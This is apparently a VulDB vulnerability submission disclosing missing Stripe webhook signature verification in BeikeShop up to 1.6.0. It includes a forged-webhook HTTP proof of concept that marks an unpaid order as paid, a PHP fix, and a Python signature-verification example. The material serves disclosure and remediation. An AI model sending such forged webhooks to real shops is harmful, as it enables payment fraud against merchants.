| Field | Value |
|---|---|
| Title | BeikeShop 1.6.0 Design/Logic Flaw |

Description:

1. TITLE
BeikeShop Stripe Plugin Missing Webhook Signature Verification Leads to Payment Bypass
2. PRODUCT
BeikeShop
3. VENDOR
BeikeShop / Guangda
4. VERSION
<= 1.6.0
5. CWE
CWE-347: Improper Verification of Cryptographic Signature
6. CVSS 3.1
7.5 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N)
7. CATEGORY
Web Application / Payment Gateway
8. SUMMARY
The Stripe payment plugin in BeikeShop does not verify webhook signatures on the `/callback/stripe` endpoint. A remote unauthenticated attacker can forge Stripe webhook events and transition arbitrary orders into the paid state without completing a legitimate payment.
9. VULNERABLE CODE
File: `plugins/Stripe/Controllers/StripeController.php`
The `callback()` method reads attacker-controlled JSON input from `$request->all()` and directly processes `charge.succeeded` events without calling `\Stripe\Webhook::constructEvent()` to verify the `Stripe-Signature` header.
10. PROOF OF CONCEPT
```http
POST /callback/stripe HTTP/1.1
Host: TARGET
Content-Type: application/json

{
  "type": "charge.succeeded",
  "data": {
    "object": {
      "metadata": {
        "order_number": "KNOWN-ORDER-NUMBER"
      }
    }
  }
}
```
Response:
```json
{"status":"success","message":"Capture Successfully"}
```
Result:
`orders.status` changes from `unpaid` to `paid`.
11. IMPACT
* Unauthorized order state manipulation
* Payment bypass
* Inventory deduction for unpaid orders
* Integrity impact on order and sales data
* Potential financial loss
12. SOLUTION
Implement Stripe webhook signature verification over the raw request body before processing webhook events:
```php
$payload   = $request->getContent();               // raw body, not $request->all()
$sigHeader = $request->header('Stripe-Signature');
$secret    = plugin_setting('stripe.webhook_secret');

try {
    // Throws if the header is missing, malformed, stale, or does not match the body
    $event = \Stripe\Webhook::constructEvent($payload, $sigHeader, $secret);
} catch (\UnexpectedValueException | \Stripe\Exception\SignatureVerificationException $e) {
    // Laravel-style response; the request never reaches the order-update logic
    return response()->json(['status' => 'fail', 'message' => 'Invalid signature'], 400);
}

// Only now are $event->type and $event->data trustworthy
```
Reject webhook requests when signature verification fails.
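Added example (not from the advisory or the BeikeShop project): a Python reimplementation of the check that `\Stripe\Webhook::constructEvent()` performs, so the scheme behind the fix is visible alongside the failure modes it closes. It assumes Stripe's documented header format (`t=<unix time>,v1=<hex HMAC-SHA256>` computed over `"<t>.<raw body>"`) and the SDK's 300-second default tolerance; the secret and the event body used in testing are constructed.

```python
import hashlib
import hmac
import json
import time

DEFAULT_TOLERANCE = 300  # seconds; the Stripe SDK's default replay window

class SignatureVerificationError(Exception):
    """Raised when a webhook must be rejected (HTTP 400) instead of processed."""

def parse_signature_header(header: str) -> tuple:
    """Split 't=<ts>,v1=<sig>[,v1=<sig>...]' into the timestamp and the v1 signatures."""
    timestamp, signatures = None, []
    for item in header.split(","):
        key, sep, value = item.strip().partition("=")
        if not sep:
            continue
        if key == "t" and value.isdigit():
            timestamp = int(value)
        elif key == "v1":
            signatures.append(value)
    if timestamp is None or not signatures:
        raise SignatureVerificationError("malformed or missing Stripe-Signature header")
    return timestamp, signatures

def compute_signature(secret: str, timestamp: int, payload: bytes) -> str:
    """HMAC-SHA256 over '<timestamp>.<raw body>' keyed with the endpoint secret."""
    signed_payload = f"{timestamp}.".encode() + payload
    return hmac.new(secret.encode(), signed_payload, hashlib.sha256).hexdigest()

def verify_stripe_signature(payload: bytes, header: str, secret: str,
                            tolerance: int = DEFAULT_TOLERANCE, now=None) -> dict:
    """Return the parsed event only if a v1 signature matches the raw body and it is fresh."""
    timestamp, signatures = parse_signature_header(header)
    expected = compute_signature(secret, timestamp, payload)
    # compare_digest keeps the check constant-time; one matching v1 (key rotation) is enough
    if not any(hmac.compare_digest(expected, sig) for sig in signatures):
        raise SignatureVerificationError("signature does not match payload")
    now = int(time.time()) if now is None else now
    if abs(now - timestamp) > tolerance:
        raise SignatureVerificationError("timestamp outside tolerance (stale or replayed event)")
    return json.loads(payload)

def sign_payload(secret: str, payload: bytes, timestamp: int) -> str:
    """Produce a valid header for a body, as Stripe does; used here to test the handler."""
    return f"t={timestamp},v1={compute_signature(secret, timestamp, payload)}"
```

An unsigned request like the one in the proof of concept fails at `parse_signature_header`, a body edited after signing fails the HMAC comparison, and a captured event replayed later fails the tolerance check.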
13. AUTHENTICATION
None required
14. USER INTERACTION
None required

| Field | Value |
|---|---|
| Source | https://github.com/nuiifornet/BeikeShop-Vulnerability/blob/main/README.md |
| User | Fklov (UID 98102) |
| Submission | 2026. 05. 16. AM 11:06 (24 days ago) |
| Moderation | 2026. 06. 07. AM 09:32 (22 days later) |
| Status | Accepted |
| VulDB Entry | 369082 [Chengdu Everbrite Network Technology BeikeShop up to 1.6.0.22 Stripe Plugin StripeController.php callback request privilege escalation] |
| Points | 20 |